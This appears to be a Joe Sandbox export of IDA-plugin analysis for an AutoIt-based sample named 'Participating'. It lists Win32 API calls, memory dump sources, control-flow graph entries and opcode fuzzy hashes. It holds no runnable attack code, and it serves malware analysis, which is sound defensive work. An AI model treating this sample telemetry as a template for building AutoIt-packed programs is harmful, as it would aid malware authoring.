                                                                                                                                                                                                                                                                  • LoadIconW.USER32(00000063), ref: 00CE3503
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00CE3515
                                                                                                                                                                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00CE3527
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CE353F
                                                                                                                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 00CE3590
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: GetSysColorBrush.USER32(0000000F), ref: 00CE3657
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: RegisterClassExW.USER32(00000030), ref: 00CE3681
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CE3692
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: InitCommonControlsEx.COMCTL32(?), ref: 00CE36AF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CE36BF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: LoadIconW.USER32(000000A9), ref: 00CE36D5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CE36E4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                  • String ID: #$0$AutoIt v3

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 00D61019
                                                                                                                                                                                                                                                                  • inet_addr.WSOCK32(?), ref: 00D61079
                                                                                                                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00D61085
                                                                                                                                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00D61093
                                                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D61123
                                                                                                                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D61142
                                                                                                                                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00D61216
                                                                                                                                                                                                                                                                  • WSACleanup.WSOCK32 ref: 00D6121C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                  • String ID: Ping

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00CE3709,?,?), ref: 00CE3777
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?,?,?,?,00CE3709,?,?), ref: 00CE37A3
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CE37C6
                                                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00CE3709,?,?), ref: 00CE37D1
                                                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00CE37E5
                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00CE3806
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                  • API String ID: 129472671-2362178303

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                  • API String ID: 0-4285391669

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1004 ce35b3-ce3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CE35E1
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CE3602
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE3616
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE361F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                  • Opcode ID: 074c2303cc94e707ab476e2af79528adec4657c5814766f95d412f7ebbe03457
                                                                                                                                                                                                                                                                  • Instruction ID: efd9f48b8b41af087d11e247642b12572a203de9fff9d4f7a0c7f6352ac174ed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 074c2303cc94e707ab476e2af79528adec4657c5814766f95d412f7ebbe03457
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF03A72600394FAE73107536C09E373EBEEBC6F10B04051EB908EB3A0D2691881DAB0

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D25287
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CE6299
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                  • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                  • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                  • Opcode ID: 4d01f42b701066c6d6301af790faf0ba2c2b9fde1e7407f77b186b9842ea7a9c
                                                                                                                                                                                                                                                                  • Instruction ID: b5b99db2e737476a9adde9bf11883e6e236cf312e019a92f44c9c053a96f343c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d01f42b701066c6d6301af790faf0ba2c2b9fde1e7407f77b186b9842ea7a9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B941D672408344AFC311EB61EC45EEF77ECAF54360F004A1EF599821A1EF749A49D7A2

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE58EF
                                                                                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE5910
                                                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00CE58BE,SwapMouseButtons,00000004,?), ref: 00CE5932
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                  • Opcode ID: 654d7c091e5b8354c737547b0eaa284b12dab6a630e7f9085a5e3734159261f2
                                                                                                                                                                                                                                                                  • Instruction ID: a3cda75b45f1454f4fbb0fee1c9a77fe2a59f4367bed5648812c1b268919e9e4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 654d7c091e5b8354c737547b0eaa284b12dab6a630e7f9085a5e3734159261f2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A117C75510658FFDB218F66DC80DEE77B9EF01764F104419F805E7210E2319E429760
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Variable must be of type 'Object'., xrefs: 00D348C6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                  • API String ID: 0-109567571
                                                                                                                                                                                                                                                                  • Opcode ID: f0fad0e8e55a01ee263ce5fb4a50fb8bf7530bccfa3bb737f93b311c24b89aa2
                                                                                                                                                                                                                                                                  • Instruction ID: eb7d5963610d88116e78a27d62fd591e0bc12dc26bcc443dc03e7ede80a4a00e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0fad0e8e55a01ee263ce5fb4a50fb8bf7530bccfa3bb737f93b311c24b89aa2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CC2AB71A00248DFCB20CF99C890BADB7F1FF09700F248169E955AB391D775AE42DBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00CF15F2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                  • Opcode ID: decffb09308f54f9b726202fcbb4297fe9426f817f882c307b1517269f07af77
                                                                                                                                                                                                                                                                  • Instruction ID: f7c2229c6fbd792c7d192b7015220f58496b08e4252edbc95b47f54945b9ae2c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: decffb09308f54f9b726202fcbb4297fe9426f817f882c307b1517269f07af77
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B28B74A08344DFCBA4CF15C480A3AB7E1BB84700F24895DEA998B352D771EE45DBA3
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00D009D8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D03614: RaiseException.KERNEL32(?,?,?,00D009FA,?,00000000,?,?,?,?,?,?,00D009FA,00000000,00DA9758,00000000), ref: 00D03674
                                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00D009F5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                  • Opcode ID: f2bc8b14c83e44613c4476a3dba3dadd6b8683a87b3d0d5c257aca8b680de837
                                                                                                                                                                                                                                                                  • Instruction ID: f4895a4fe25fddf1cdb3e071830c8ec679b1b90aa286174c17d4334440ca0430
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2bc8b14c83e44613c4476a3dba3dadd6b8683a87b3d0d5c257aca8b680de837
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0A43490020CB6CB00BAA4E856B9E7B6C9E01350F584121B95CD75D2FB71E61A8AF1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00D68D52
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00D68D59
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00D68F3A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 146820519-0
                                                                                                                                                                                                                                                                  • Opcode ID: facee0ade242b532cadec3c9e223e4caf58b41075f0bc6cc1e22738cdcf38fcd
                                                                                                                                                                                                                                                                  • Instruction ID: a503ab861d5ce2b485522c9574a0abaa70551be93a6973811a3b84eacb9b4cb2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: facee0ade242b532cadec3c9e223e4caf58b41075f0bc6cc1e22738cdcf38fcd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16125B71A083419FC714CF28C484B2ABBE5FF88314F18895DF8899B252DB71E945DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 306214811-0
                                                                                                                                                                                                                                                                  • Opcode ID: 51d078e9ce6fb433c12c4a02fd16bf8bbce8bd708438c97904be6beac85a4de4
                                                                                                                                                                                                                                                                  • Instruction ID: c953dae27e79ff8c928ba7ca4435deb8dc0cfbe525d012c6f0765340fab1f18f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51d078e9ce6fb433c12c4a02fd16bf8bbce8bd708438c97904be6beac85a4de4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7A15A31600645EFCB18DF18D5E19A9BBE5FF45314B2484ADE84A8F292DB31ED42CFA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CE32AF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00CE32B7
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CE32C2
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CE32CD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00CE32D5
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00CE32DD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE3205: RegisterWindowMessageW.USER32(00000004,?,00CE2964), ref: 00CE325D
                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00CE2A0A
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32 ref: 00CE2A28
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00D23A0D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00CE6299
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00CFFD36
                                                                                                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CFFD45
                                                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D3FE33
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,00D1894C,?,00DA9CE8,0000000C), ref: 00D18A84
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00D1894C,?,00DA9CE8,0000000C), ref: 00D18A8E
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00D18AB9
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00D197BA,FF8BC369,00000000,00000002,00000000), ref: 00D19744
